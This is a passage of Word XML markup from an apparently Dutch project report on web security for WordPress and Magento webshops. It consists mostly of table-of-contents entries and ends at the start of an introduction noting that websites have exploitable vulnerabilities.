            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc491022091 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>85</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="32F4604A" w14:textId="77777777" w:rsidR="00A27982" w:rsidRDefault="00A27982">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9062"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
              <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc491022092" w:history="1">
            <w:r w:rsidRPr="00C57919">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>5.1.4 Domein model</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc491022092 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>86</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="641EBB37" w14:textId="77777777" w:rsidR="00A27982" w:rsidRDefault="00A27982">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9062"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
              <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc491022093" w:history="1">
            <w:r w:rsidRPr="00C57919">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>5.2 Systeem Diagrammen</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc491022093 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>87</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0A012000" w14:textId="77777777" w:rsidR="00A27982" w:rsidRDefault="00A27982">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9062"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
              <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc491022094" w:history="1">
            <w:r w:rsidRPr="00C57919">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>5.2.1 Sequence Diagr</w:t>
            </w:r>
            <w:r w:rsidRPr="00C57919">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>a</w:t>
            </w:r>
            <w:r w:rsidRPr="00C57919">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>m</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc491022094 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>87</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="68354C81" w14:textId="77777777" w:rsidR="00A27982" w:rsidRDefault="00A27982">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9062"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
              <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc491022095" w:history="1">
            <w:r w:rsidRPr="00C57919">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>5.2.2 Database</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc491022095 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>90</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5FC4ED05" w14:textId="77777777" w:rsidR="00A27982" w:rsidRDefault="00A27982">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9062"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
              <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc491022096" w:history="1">
            <w:r w:rsidRPr="00C57919">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>6. Realisatie</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc491022096 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>92</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="20C5B1D5" w14:textId="77777777" w:rsidR="00A27982" w:rsidRDefault="00A27982">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9062"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
              <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc491022097" w:history="1">
            <w:r w:rsidRPr="00C57919">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Scope van de realisatie</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc491022097 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>92</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5B440A20" w14:textId="77777777" w:rsidR="00A27982" w:rsidRDefault="00A27982">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9062"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
              <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc491022098" w:history="1">
            <w:r w:rsidRPr="00C57919">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
                <w:lang w:val="en-GB"/>
              </w:rPr>
              <w:t>Bronnenlijst</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc491022098 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>93</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5C454DFB" w14:textId="77777777" w:rsidR="00A27982" w:rsidRDefault="00A27982">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9062"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
              <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc491022099" w:history="1">
            <w:r w:rsidRPr="00C57919">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Bijlage A</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc491022099 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>94</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="69CD86A6" w14:textId="77777777" w:rsidR="00A27982" w:rsidRDefault="00A27982">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9062"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
              <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc491022100" w:history="1">
            <w:r w:rsidRPr="00C57919">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Glossary</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc491022100 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>94</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0CB380CC" w14:textId="77777777" w:rsidR="00A27982" w:rsidRDefault="00A27982">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9062"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
              <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc491022101" w:history="1">
            <w:r w:rsidRPr="00C57919">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>OWASP Definities</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc491022101 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>95</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5D60DA90" w14:textId="77777777" w:rsidR="00A27982" w:rsidRDefault="00A27982">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9062"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
              <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc491022102" w:history="1">
            <w:r w:rsidRPr="00C57919">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Kwaliteit attributen</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc491022102 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>98</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="67ADB8F3" w14:textId="77777777" w:rsidR="00A27982" w:rsidRDefault="00A27982">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9062"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
              <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc491022103" w:history="1">
            <w:r w:rsidRPr="00C57919">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>REST API</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc491022103 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>99</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0E9D3F09" w14:textId="77777777" w:rsidR="00A27982" w:rsidRDefault="00A27982">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9062"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
              <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc491022104" w:history="1">
            <w:r w:rsidRPr="00C57919">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Usecase bijlage 5.1.3</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc491022104 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>100</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4188004E" w14:textId="77777777" w:rsidR="00A27982" w:rsidRDefault="00A27982">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9062"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
              <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc491022105" w:history="1">
            <w:r w:rsidRPr="00C57919">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Bijlage B</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc491022105 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>104</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1980877B" w14:textId="77777777" w:rsidR="00A27982" w:rsidRDefault="00A27982">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9062"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
              <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc491022106" w:history="1">
            <w:r w:rsidRPr="00C57919">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Vergrote Diagrammen</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc491022106 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>104</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5C868376" w14:textId="14647C17" w:rsidR="004652B4" w:rsidRDefault="004652B4">
          <w:r>
            <w:rPr>
              <w:b/>
              <w:bCs/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:p>
      </w:sdtContent>
    </w:sdt>
    <w:p w14:paraId="3F8A8143" w14:textId="4D3980A1" w:rsidR="00FA284E" w:rsidRPr="00380DF9" w:rsidRDefault="00E516D4" w:rsidP="00380DF9">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_Toc491022044"/>
      <w:r w:rsidR="00380DF9" w:rsidRPr="00380DF9">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">1 </w:t>
      </w:r>
      <w:r w:rsidR="006822D8" w:rsidRPr="00380DF9">
        <w:t>Inleiding</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w14:paraId="505B3C8B" w14:textId="4FD63692" w:rsidR="006822D8" w:rsidRPr="006D01D5" w:rsidRDefault="006822D8" w:rsidP="00354798">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="1" w:name="_Toc491022045"/>
      <w:r>
        <w:t>1.1 aanleiding</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
    </w:p>
    <w:p w14:paraId="572E89C5" w14:textId="3DA62C5F" w:rsidR="006822D8" w:rsidRDefault="006822D8" w:rsidP="006822D8">
      <w:r>
        <w:t xml:space="preserve">Het is algemeen bekent dat websites kwetsbaarheden hebben waar hackers gebruik van maken door deze te exploiteren. S5 specialiseert zich in het ontwikkelen van website, in het specifiek webshops. Hiervoor gebruiken zij de Content Management Systemen (CMS) platformen </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>WordPress</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> en </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Magento</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, twee </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>CMS platformen</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
